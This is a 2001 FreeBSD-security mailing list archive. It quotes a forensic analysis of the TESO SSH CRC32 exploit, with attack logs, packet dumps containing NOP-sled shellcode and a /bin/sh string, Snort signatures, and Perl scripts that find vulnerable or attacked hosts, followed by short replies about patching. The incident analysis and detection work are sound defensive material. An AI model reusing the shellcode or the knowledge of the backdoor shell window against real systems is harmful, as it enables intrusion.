sshd[9600]: log: Connection from 10.10.10.10 port 33387 >Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388 >Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389 >Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390 >Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391 >Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392 >Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393 >Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes >on input. >Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394 >Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395 >Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396 >Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397 >Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398 >Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes >on input. >Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399 >Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400 >Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401 >Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication. > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >One final point. Note the last syslog entry. The successful exploit >causes an authentication attempt to pause while the shell code back door >becomes active. You can connect to the shell and do whatever you >want. Only problem is, the original SSH daemon (at least with SSH.com >1.2.31) will timeout when the authentication doesn't complete, and the >shell will be terminated. This gives a window of ten minutes (at >least with SSH.com 1.2.31) before the listening shell's parent dies >and another exploit attempt must be started. (That is plenty of time >to fully root the box eight ways from Sunday, unfortunately.) > > > >Network traffic >=============== > >Tcpdump was used to capture the two "attacks" shown above. (The tcpdump >file "sshdx.dump", rather than the exploit itself, is available [11] >for those wishing to tune their IDSs to detect signatures of this >particular exploit. Use something like "tcpreplay" [12] if your IDS >does not support tcpdump files, then tell your coders to write tcpdump >import functions like Snort. ;) > >[NOTE: The tcpdump file was obtained using Red Hat's screwed up >libpcap, which includes the device name in the dump records. This >means that all utilities, like "ngrep", must be linked against >Red Hat's stock libpcap in order to read this file. I REALLY wish >that Red Hat had worked with the folks who maintain libpcap and >convinced them to support either dump format, or switch to adding >the device name in the standard libpcap, instead of going their >own way in what seems to be typical Linux fashion. This *really* >makes it hard to share tcpdump files between operating systems.] > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ># tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 & > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >It can readily be seen that multiple connections are made to the SSH >daemon, and using "ngrep" [5], you can even spot the final connection >and brute force attack which interjects the shell code: > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > . . . > >T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP] > SSH-1.5-1.2.31. > >T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP] > SSH-1.5-OpenSSH_2.2.0p1. > >T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP] > ............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h..... > ..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j > W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K .@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<. > >T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP] > ............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....) > T.....|c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z > ....Q/.......8.. > >T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP] > .........4.. > >T 10.10.10.10:32957 -> 10.10.10.3:2222 [A] > ..W...2.......2.......2.......2.......2.......2.......2.......2....... > 2.......2.......2.......2.......2.......2.......2.......2.......2 .... > ..2!......2$......2%......2(......2)......2,......2-......20......21.. > ....24......25......28......29......2<......2=......2@......2A......2D > ......2E......2H......2I......2L......2M......2P......2Q......2T...... > 2U......2X......2Y......2\......2]......2`......2a......2d......2e.... > ..2h......2i......2l......2m......2p......2q......2t......2u......2x.. > ....2y......2|......2}......2.......2.......2.......2.......2.......2. > ......2.......2.......2.......2.......2.......2.......2.......2....... > 2.......2.......2.......2.......2.......2.......2.......2.......2..... > ..2.......2.......2.......2.......2.......2.......2.......2.......2... > ....2.......2.......2.......2.......2.......2.......2.......2.......2. > ......2.......2.......2.......2.......2.......2.......2.......2....... > 2.......2.......2.......2.......2.......2.......2.......2.......2..... > ..2.......2.......2.......2.......2.......2.......3.......3.......3... > ....3.......3.......3.......3.......3.......3.......3.......3.......3. > ......3.......3.......3.......3.......3 ......3!......3$......3%...... > 3(......3)......3,......3-......30......31......34......35......38.... > ..39......3<......3=......3@......3A......3D......3E......3H......3I.. > ....3L......3M......3P......3Q......3T......3U......3X......3Y......3\ > ......3]......3`......3a......3d........1...p}.@ > >T 10.10.10.10:32957 -> 10.10.10.3:2222 [A] > ......3i......3l......3m......3p......3q......3t......3u......3x...... > 3y......3|......3}......3.......3.......3.......3.......3.......3..... > ..3.......3.......3.......3.......3.......3.......3.......3.......3... > ....3.......3.......3.......3.......3.......3.......3.......3.......3. > ......3.......3.......3.......3.......3.......3.......3.......3....... > 3.......3.......3.......3.......3.......3.......3.......3.......3..... > ..3.......3.......3.......3.......3.......3.......3.......3.......3... > ....3.......3.......3.......3.......3.......3.......3.......3.......3. > ......3.......3.......3.......3.......3.......4.......4.......4....... > 4.......4.......4.......4.......4.......4.......4.......4.......4..... > ..4.......4.......4.......4.......4 ......4!......4$......4%......4(.. > ....4)......4,......4-......40......41......44......45......48......49 > ......4<......4=......4@......4A......4D......4E......4H......4I...... > 4L......4M......4P......4Q......4T......4U......4X......4Y......4\.... > ..4]......4`......4a......4d......4e......4h......4i......4l......4m.. > ....4p......4q......4t......4u......4x......4y......4|......4}......4. > ......4.......4.......4.......4.......4.......4.......4.......4....... > 4.......4.......4.......4.......4.......4.......4.......4.......4..... > ..4.......4.......4.......4.......4.......4.......4.......4.......4... > ....4.......4.......4.......4.......4.......4.......4.......4.......4. > ......4.......4.......4.......4.........1...p}.@ > > . . . > >T 10.10.10.10:32957 -> 10.10.10.3:2222 [A] > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > .....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E. > .E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U....... > ./bin/sh.h0h0h0, 7350, zip/TESO!...................................... > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > ...................................................................... > ........................................1...p}.@ > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >You can match (for this exploit binary) on the string "h0h0h0, 7350, >zip/TESO!" [7] in the packet payload, as well as for the "/bin/sh" >and NOP sled. (Of course these, and other strings, may change or >disappear in derivatives of the original source.) > >The following signatures were developed by Marty Roesch and Brian >Caswell, for use with Snort v1.8 or higher [6]. > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \ > (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \ > flags:A+; content:"/bin/sh"; \ > reference:bugtraq,2347; reference:cve,CVE-2001-0144; \ > classtype:shellcode-detect;) > >alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \ > (msg:"EXPLOIT ssh CRC32 overflow filler"; \ > flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \ > reference:bugtraq,2347; reference:cve,CVE-2001-0144; \ > classtype:shellcode-detect;) > >alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \ > (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \ > flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \ > reference:bugtraq,2347; reference:cve,CVE-2001-0144; \ > classtype:shellcode-detect;) > >alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \ > (msg:"EXPLOIT ssh CRC32 overflow"; \ > flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \ > content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \ > reference:bugtraq,2347; reference:cve,CVE-2001-0144; \ > classtype:shellcode-detect;) > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >Identification of potentially vulnerable or exploited hosts >=========================================================== > >Two scanners exist to identify ssh servers and their versions: Jeremy >Mates' scan_ssh.pl[8] and Niels Provos' ScanSSH scanner[9]. A script >to take the results of a scan with scan_ssh.pl and produce a break >report on SSH server version and potential vulnerability can be found >in Appendix A. You may need to update the script based on >vulnerability information provided by the authors of various SSH >servers to get accurate results. > >Russell Fulton also has published a script for processing Argus[10] >logs, included below in Appendix C. > > >Final Note >========== > >Team TESO issued a public statement about this exploit on 11/8/2001. >You can find it here: > > http://www.team-teso.org/sshd_statement.php > > >Credits >======= > >Thanks to Cindy Jenkins of UW MCIS for recovery of the artifacts >analyzed here, Marty Roesch and Brian Caswell for Snort signatures, >Mike Hornung for vulnerability assessment scan data and patches to >Jeremy Mates' scanner, Russell Fulton, Peter Van Epp, Simple Nomad, >Rik Farrow, Dug Song, other unnamed individuals, and all the folks at >SecurityFocus.com for their input. > > >Dave Dittrich >http://staff.washington.edu/dittrich/ > > >The most recent version of this file can be found at: > > http://staff.washington.edu/dittrich/misc/ssh-analysis.txt > > >References >========== > >[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen > http://www.all.net/ForensiX/plac.html > >[2] Netcat, by der Hobbit > http://www.l0pht.com/~weld/netcat/ > >[3] Reverse Engineer's Query Tool > http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz > >[4] LiSt Open Files (lsof) > http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz > >[5] ngrep, by Jordan Ritter > http://www.packetfactory.net/projects/ngrep/ > >[6] Snort, by Marty Roesch and a cast of thousands > http://www.snort.org/ > >[7] 7350.org / 7350 > http://www.7350.org/ > http://www.team-teso.org/about.php (see the bottom) > >[8] ssh_scan.pl, by Jeremy Mates > http://sial.org/code/perl/scripts/ssh_scan.pl.html > >[9] ScanSSH scanner by Niels Provos > http://www.monkey.org/~provos/scanssh/ > >[10] Argus - A generic IP network transaction auditing tool > http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1 > >[11] tcpdump of attack traffic (using Red Hat's screwed up version of libpcap) > http://staff.washington.edu/dittrich/misc/sshdx.dump > >[12] tcpreplay > http://packages.debian.org/testing/net/tcpreplay.html > > >Appendix A >========== > >Script for producing a one level break report based on known >vulnerability status of several SSH servers and versions. >(NOTE: You may need to modify this script for it to be accurate, >and to understand its limitations - You must read it before using >it.) > > > =-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >#!/usr/bin/perl ># ># ssh-report ># ># Dave Dittrich ># Thu Nov 8 21:39:20 PST 2001 ># ># Process output of scans for SSH servers, with version identifying ># information, into two level break report format by SSH version. ># ># This script operates on a list of scan results that look ># like this: ># ># % cat scanresults ># 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31 ># 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31 ># 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2 ># 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31 ># 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2 ># 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1 ># 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2 ># 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2 ># 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2 ># ># The resulting report (without the "-a" flag) will look like this: ># ># % ssh-report < scanresults ># ># SSH-1.5-1.2.31 (affected) ># beavertail.dept.foo.edu(10.0.0.1) ># lumpysoup.dept.foo.edu(10.0.0.2) ># junebug.dept.foo.edu(10.0.0.4) ># ># ># SSH-1.99-OpenSSH_2.1.1 (affected) ># hobbes.dept.foo.edu(10.0.0.11) ># ># By default, this script will only report on those systems that ># are running potentially vulnerable SSH servers. Use the "-a" ># option to report on all servers. Use "grep -v" to filter out ># hosts *before* you run them through this reporting script. ># ># SSH servers are considered "affected" if they are known, by being ># listed in one or more of the following references, to have the crc32 ># compensation attack detector vulnerability: ># ># http://www.kb.cert.org/vuls/id/945216 ># http://www.securityfocus.com/bid/2347/ ># http://xforce.iss.net/alerts/advise100.php ># http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm ># ># You also may need to adjust the logic below to lump systems ># into the "Unknown" category correctly (e.g., if your server ># has a custom version string, access control, etc.) ># ># The list below of servers and potential vulnerability was derived by ># summarizing existing versions on a set of production networks and ># using the advisories and reference material listed above. You ># should update this list as new information is obtained, or if new ># versions of the SSH server are found on your network. > >%affected = ( >'Unknown', 'unknown', >'SSH-1.4-1.2.14', 'not affected', >'SSH-1.4-1.2.15', 'not affected', >'SSH-1.4-1.2.16', 'not affected', >'SSH-1.5-1.2.17', 'not affected', >'SSH-1.5-1.2.18', 'not affected', >'SSH-1.5-1.2.19', 'not affected', >'SSH-1.5-1.2.20', 'not affected', >'SSH-1.5-1.2.21', 'not affected', >'SSH-1.5-1.2.22', 'not affected', >'SSH-1.5-1.2.23', 'not affected', >'SSH-1.5-1.2.24', 'affected', >'SSH-1.5-1.2.25', 'affected', >'SSH-1.5-1.2.26', 'affected', >'SSH-1.5-1.2.27', 'affected', >'SSH-1.5-1.2.28', 'affected', >'SSH-1.5-1.2.29', 'affected', >'SSH-1.5-1.2.30', 'affected', >'SSH-1.5-1.2.31', 'affected', >'SSH-1.5-1.2.31a', 'not affected', >'SSH-1.5-1.2.32', 'not affected', >'SSH-1.5-1.3.7', 'not affected', >'SSH-1.5-Cisco-1.25', 'unknown', >'SSH-1.5-OSU_1.5alpha1', 'unknown', >'SSH-1.5-OpenSSH-1.2', 'affected', >'SSH-1.5-OpenSSH-1.2.1', 'affected', >'SSH-1.5-OpenSSH-1.2.2', 'affected', >'SSH-1.5-OpenSSH-1.2.3', 'affected', >'SSH-1.5-OpenSSH_2.5.1', 'not affected', >'SSH-1.5-OpenSSH_2.5.1p1', 'not affected', >'SSH-1.5-OpenSSH_2.9p1', 'not affected', >'SSH-1.5-OpenSSH_2.9p2', 'not affected', >'SSH-1.5-RemotelyAnywhere', 'not affected', >'SSH-1.99-2.0.11', 'affected w/Version 1 fallback', >'SSH-1.99-2.0.12', 'affected w/Version 1 fallback', >'SSH-1.99-2.0.13', 'affected w/Version 1 fallback', >'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback', >'SSH-1.99-2.1.0', 'affected w/Version 1 fallback', >'SSH-1.99-2.2.0', 'affected w/Version 1 fallback', >'SSH-1.99-2.3.0', 'affected w/Version 1 fallback', >'SSH-1.99-2.4.0', 'affected w/Version 1 fallback', >'SSH-1.99-3.0.0', 'affected w/Version 1 fallback', >'SSH-1.99-3.0.1', 'affected w/Version 1 fallback', >'SSH-1.99-OpenSSH-2.1', 'affected', >'SSH-1.99-OpenSSH_2.1.1', 'affected', >'SSH-1.99-OpenSSH_2.2.0', 'affected', >'SSH-1.99-OpenSSH_2.2.0p1', 'affected', >'SSH-1.99-OpenSSH_2.3.0', 'not affected', >'SSH-1.99-OpenSSH_2.3.0p1', 'not affected', >'SSH-1.99-OpenSSH_2.5.1', 'not affected', >'SSH-1.99-OpenSSH_2.5.1p1', 'not affected', >'SSH-1.99-OpenSSH_2.5.1p2', 'not affected', >'SSH-1.99-OpenSSH_2.5.2p2', 'not affected', >'SSH-1.99-OpenSSH_2.9.9p2', 'not affected', >'SSH-1.99-OpenSSH_2.9', 'not affected', >'SSH-1.99-OpenSSH_2.9p1', 'not affected', >'SSH-1.99-OpenSSH_2.9p2', 'not affected', >'SSH-1.99-OpenSSH_3.0p1', 'not affected', >'SSH-2.0-1.1.1', 'unknown', >'SSH-2.0-2.3.0', 'affected w/Version 1 fallback', >'SSH-2.0-2.4.0', 'affected w/Version 1 fallback', >'SSH-2.0-3.0.0', 'affected w/Version 1 fallback', >'SSH-2.0-3.0.1', 'affected w/Version 1 fallback', >'SSH-2.0-OpenSSH_2.5.1p1', 'not affected', >'SSH-2.0-OpenSSH_2.5.2p2', 'not affected', >'SSH-2.0-OpenSSH_2.9.9p2', 'not affected', >'SSH-2.0-OpenSSH_2.9p2', 'not affected', >); > ># Make SURE you read the code first. >&IKnowWhatImDoing(); > >$all++, shift(@ARGV) if $ARGV[0] eq "-a"; > >while (<>) { > chop; > s/\s+/ /g; > ($ip, $host, $version) = split(' ', $_); > > # Adjust this to identify other strings reported > # by servers that have access restrictions, etc. > # in place and do not show a specific version number. > # They all fall under the category "Unknown" in this case. > $version = "Unknown" > if ($version eq "Couldn't" || > $version eq "Unknown" || > $version eq "You" || > $version eq "timeout"); > > $server{"$version:$ip"} = $host; >} > >foreach $i (sort keys %server) { > ($version,$ip) = split(":", $i); > next if ($affected{$version} eq "not affected" && ! $all); > printf("\n\n%s (%s)\n", $version, $affected{$version}) > if ($curver ne $version); > $curver = $version; > print " " . $server{$i} . "($ip)\n"; >} > >exit(0); > >sub IKnowWhatImDoing { > local $IKnowWhatImDoing = 0; > > # Uncomment the following line to make this script work. > # $IKnowWhatImDoing++; > die "I told you to read the code first, didn't I?\n" > unless $IKnowWhatImDoing; > return; >} > =-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >Appendix C >========== > >Russell Fulton published the following to the unisog@sans.org >email list, based on information provided by Peter Van Epp. > > > >From r.fulton@auckland.ac.nz Thu Nov 8 12:38:15 2001 >Date: Mon, 5 Nov 2001 11:31:05 +1300 (NZDT) >Subject: [unisog] Tool to find ssh attacks in argus logs >From: Russell Fulton >To: unisog@sans.org, argus-info@lists.andrew.cmu.edu > >Greetings All, > Here is a quick perl hack to scan archived argus[1] logs >for evidence of ssh attacks. The current attack that we have seen >iterates an offset for the shell code and this script picks up the >repeated attempts. The script is quite specific to this attack and >looks for ssh session within a quite narrow size range. > >It has been tested by Peter Van Epp (thanks Peter!) on real data and >picked up all know attacks that they had seen and outgoing attacks from >machine on the network that had already been compromised. Peter also >modified the script to work with argus 1.8.x (see comments). > >This is a first cut at this problem. If I get time I will modify this >(using stuff from my watcher scan detector script) to give real time >notification on attacks. > >[1]: Argus IP audit tool http://www.qosient.com > >Russell Fulton, Computer and Network Security Officer >The University of Auckland, New Zealand > >#!/usr/bin/perl > >my %ipn; > >$ENV{TZ} = 'UTC'; > > ># Assumes version 2.0 ra -- remove A switch if running with 1.8.x data > >if (! open(RA, "bin/ra -Ancr ".join(' ', @ARGV) . > " - tcp and dst port 22 |") ) { > die "failed to open connection to server"; >} > >while() { > chomp; > my ( $timestmp, $proto, $src, $srcp, $sym, $dst, > $dstp, $topkt, $fpkt, $tobytes, $fbytes, $status) = > unpack "A19x3A4a15xA6A3x2A16xA5xA8xA9xA12xA12a10", $_; ># From Peter Van Epp: ># If you are luditte like me and still running 1.8.1 comment out the 3 lines ># above and uncomment the 5 lines below > ># my ( $timestmp, $flag, $proto, $src, $srcp, $sym, $dst, ># $dstp, $topkt, $fpkt, $tobytes, $fbytes, $status) = ># unpack "A18xA3xA4xA15xA6A3xA15xA5xA6xA6x2A9xA9A3", $_; ># $src =~ s/ //g; ># $dst =~ s/ //g; > >next unless ( $tobytes > 90000 and $tobytes < 110000 and > $fbytes > 300 and $fbytes < 400); > > if( ! exists $ipn{$src} ) { > $ipn {$src} = {}; > $ipn {$src}->{COUNT} = 1; > $ipn {$src}->{TOTAL} = 0; > $ipn{$src}->{TIME} = $timestmp; >#print "$ipn{$src}->{TIME}\n"; > $ipn {$src}->{$dst} = 1; > }; > if( ! exists $ipn{$src}->{$dst} ) { > $ipn {$src}->{COUNT}++; > $ipn {$src}->{$dst} = 1; > } else { > $ipn {$src}->{$dst}++; > } > $ipn {$src}->{TOTAL}++; > $ipn{$src}->{LTIME} = $timestmp; > >} >print scalar keys %ipn, "\n"; > >foreach my $ip (sort {$ipn{$b}->{TOTAL} <=> $ipn{$a}->{TOTAL}} keys >%ipn ) { ># my $dn = gethostbyaddr(pack("C4",split(/\./,$ipn)),2) || ''; ># last if $ipn{$ip}->{TOTAL} == 1; > print "$ip $ipn{$ip}->{TIME} -- $ipn{$ip}->{LTIME} # number of >targets $ipn{$ip}->{COUNT} total sessions $ipn{$ip}->{TOTAL}\n" ; >} >-- >Dave Dittrich Computing & Communications >dittrich@cac.washington.edu University Computing Services >http://staff.washington.edu/dittrich University of Washington > >PGP key http://staff.washington.edu/dittrich/pgpkey.txt >Fingerprint FE 97 0C 57 08 43 F3 EB 49 A1 0C D0 8E 0C D0 BE C8 38 CC B5 > > >---------------------------------------------------------------------------- >This list is provided by the SecurityFocus ARIS analyzer service. >For more information on this free incident handling, management >and tracking system please see: http://aris.securityfocus.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 18 12:13:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from thedarkside.nl (cc31301-a.assen1.dr.nl.home.com [213.51.66.128]) by hub.freebsd.org (Postfix) with ESMTP id C23DE37B405 for ; Sun, 18 Nov 2001 12:13:38 -0800 (PST) Received: (from root@localhost) by thedarkside.nl (8.11.6/8.11.6) id fAIKDZJ25858; Sun, 18 Nov 2001 21:13:35 +0100 (CET) (envelope-from g.p.de.boer@st.hanze.nl) Received: from kilmarnock.st.hanze.nl (kilmarnock [10.0.0.2]) by thedarkside.nl (8.11.6/8.11.6av) with ESMTP id fAIKDUB25850; Sun, 18 Nov 2001 21:13:30 +0100 (CET) (envelope-from g.p.de.boer@st.hanze.nl) Message-Id: <5.1.0.14.0.20011118211207.01fd4df8@thedarkside.nl> X-Sender: 125105@pop5.st.hanze.nl X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sun, 18 Nov 2001 21:13:28 +0100 To: Brett Glass , security@freebsd.org From: "G.P. de Boer" Subject: Re: Patching 4.4-RELEASE against SSHv1 exploit In-Reply-To: <4.3.2.7.2.20011118124921.041ea050@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 20:56 18-11-2001, Brett Glass wrote: >In a recent message to Bugtraq (quoted below), Dave Dittrich notes that an >SSH exploit has been specifically tuned to attack machines running FreeBSD >4.x and certain versions of SSH. The hole apparently dates back to the >liberally licensed versions of SSH, and so is present in both OpenSSH and >SSH, Inc.'s SSH. Is 4.4-RELEASE vulnerable in the default install if sshd >is enabled? If so, is there a patch? 4.4-RELEASE base has OpenSSH-2.3.0, which isn't vulnerable to this attack. GP. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 18 12:43:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 953FD37B417 for ; Sun, 18 Nov 2001 12:43:19 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id MAA17042; Sun, 18 Nov 2001 12:42:33 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda17040; Sun Nov 18 12:42:20 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.6/8.9.1) id fAIKgEk61599; Sun, 18 Nov 2001 12:42:14 -0800 (PST) Received: from UNKNOWN(10.1.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpde61597; Sun Nov 18 12:41:16 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.6/8.9.1) id fAIKfGE03587; Sun, 18 Nov 2001 12:41:16 -0800 (PST) Message-Id: <200111182041.fAIKfGE03587@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdcR3575; Sun Nov 18 12:40:55 2001 X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Patching 4.4-RELEASE against SSHv1 exploit In-reply-to: Your message of "Sun, 18 Nov 2001 12:56:07 MST." <4.3.2.7.2.20011118124921.041ea050@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 18 Nov 2001 12:40:55 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <4.3.2.7.2.20011118124921.041ea050@localhost>, Brett Glass writes: > In a recent message to Bugtraq (quoted below), Dave Dittrich notes that > an SSH exploit has been specifically tuned to attack machines running > FreeBSD 4.x and certain versions of SSH. The hole apparently dates back > to the liberally licensed versions of SSH, and so is present in both > OpenSSH and SSH, Inc.'s SSH. Is 4.4-RELEASE vulnerable in the default > install if sshd is enabled? If so, is there a patch? This should answer your question: http://www.securityfocus.com/archive/82/222981 Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Email: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD Ministry of Management Services Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 18 16: 0:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 3988737B416; Sun, 18 Nov 2001 16:00:56 -0800 (PST) Received: (from str@localhost) by giganda.komkon.org (8.11.3/8.11.3) id fAJ00tv10839; Sun, 18 Nov 2001 19:00:55 -0500 (EST) (envelope-from str) Date: Sun, 18 Nov 2001 19:00:55 -0500 (EST) From: Igor Roshchin Message-Id: <200111190000.fAJ00tv10839@giganda.komkon.org> To: security@FreeBSD.org Subject: OpenSSH port woes Cc: dinoex@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org OpenSSH port downloaded today from ftp.freebsd.org complains about the patch that doesn't exist on ftp.freebsd.org: ...ports/security/openssh#make >> openssh-3.0.1.tgz doesn't seem to exist in /usr/ports/distfiles/. >> Attempting to fetch from ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/. Receiving openssh-3.0.1.tgz (363849 bytes): 100% 363849 bytes transferred in 25.4 seconds (13.97 Kbytes/s) >> openbsd2x_3.0.1.patch doesn't seem to exist in /usr/ports/distfiles/. >> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/. fetch: pub/FreeBSD/ports/distfiles/openbsd2x_3.0.1.patch: cannot get remote modi fication time fetch: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/openbsd2x_3.0.1.patch: FTP error: fetch: File unavailable (e.g., file not found, no access) >> Couldn't fetch it - please try to retrieve this >> port manually into /usr/ports/distfiles/ and try again. *** Error code 1 Stop in /usr/ports/security/openssh. ...... Best, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 18 17:29:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from thunder.adam.com.au (thunder.adam.com.au [203.2.124.10]) by hub.freebsd.org (Postfix) with SMTP id 458B537B41C for ; Sun, 18 Nov 2001 17:29:07 -0800 (PST) Received: (qmail 30826 invoked from network); 19 Nov 2001 01:29:26 -0000 Received: from unknown (HELO server.hirecom.com.au) (203.2.124.238) by eden.adam.com.au with SMTP; 19 Nov 2001 01:29:26 -0000 Received: from da001d2181.lax-ca.osd.concentric.net ([208.36.183.138]) by server.hirecom.com.au with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id WJF67YYY; Mon, 19 Nov 2001 11:57:50 +1030 From: <61sweetheart@altavista.com> 